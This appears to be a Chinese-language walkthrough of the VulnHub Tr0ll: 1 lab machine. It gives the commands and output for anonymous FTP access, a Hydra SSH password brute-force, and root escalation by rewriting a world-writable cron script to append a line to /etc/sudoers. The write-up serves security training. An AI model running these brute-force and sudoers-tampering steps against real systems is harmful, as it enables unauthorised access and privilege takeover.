Tr0ll: 1

项目地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar

是一个打包好的镜像文件

注意:导入 vmx 时一定要选择我已移动,否则没网

使用 Nmap 扫描出开放服务及操作系统版本

扫描目录发现 secret 路径,但是也什么都没有

弱口令

FTP

尝试匿名登录,用户名: anonymousftp,密码任意或为空

SSH

查看文件发现有一个 lol.pacp

下载下来

分析 FTP 流量发现有一个 secret_stuff.txt

再次过滤 ftp-data 即可查看传输的文件内容

1
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n

重新扫描 sup3rs3cr3tdirlol 路径可以拿到一个二进制文件

运行却说 0x0856BF 地址未找到

再次以 0x0856BF 为路径扫描拿到两个新路径

1
2
[DIR] good_luck/
[DIR] this_folder_contains_the_password/

访问第一个拿到一个 txt

1
2
3
4
5
6
7
8
9
10
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

第二个则是

1
Good_job_:)

根据文件夹名称提示第二个是密码,第一个则是用户名尝试爆破

(打住打住!!!)

如果 SSH 登录次数过多则会封锁 IP,并且 Good_job_:) 是个假密码。真正的密码是其文件名 Pass.txt

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# hydra -v -V -u -L list -p "Pass.txt" -t 1 -u 192.168.56.101 ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

[DATA] 1 task, 1 server, 13 login tries (l:13/p:1), ~13 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.56.101 - login "maleus" - pass "Pass.txt" - 1 of 13 [child 0]
[ATTEMPT] target 192.168.56.101 - login "ps-aux" - pass "Pass.txt" - 2 of 13 [child 0]
[ATTEMPT] target 192.168.56.101 - login "felux" - pass "Pass.txt" - 3 of 13 [child 0]
[...]
[22][ssh] host: 192.168.56.101   login: overflow   password: Pass.txt

提权

定时任务

登录上去过后每隔一段时间就会断开连接

在 Cron 日志查看有没有定时任务

Cron 日志主要记录系统中定时任务的执行情况,包括:

  • 每次任务执行的精确时间戳

  • 执行任务的用户身份(如 root、www-data)

  • 被执行的命令或脚本的完整路径

  • 任务执行后的输出或错误信息(通常通过邮件或系统日志记录)

去找这个文件

1
2
3
4
5
overflow@troll:/$ find / -name cleaner.py | grep "cleaner.py"
...
...
...
/lib/log/cleaner.py

看一下文件内容

1
2
3
4
5
6
7
8
overflow@troll:/$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()

好消息是这个文件是所有人可写的

1
-rwxrwxrwx 1 root  root    145 Aug 14 13:11 /lib/log/cleaner.py

所以我们直接修改文件

1
2
3
4
5
6
7
#!/usr/bin/env python
import os
import sys
try:
        os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
        sys.exit()

然后再次登录就能获取 Root 权限了

1
2
3
overflow@troll:/$ sudo su
sudo: unable to resolve host troll
root@troll:/#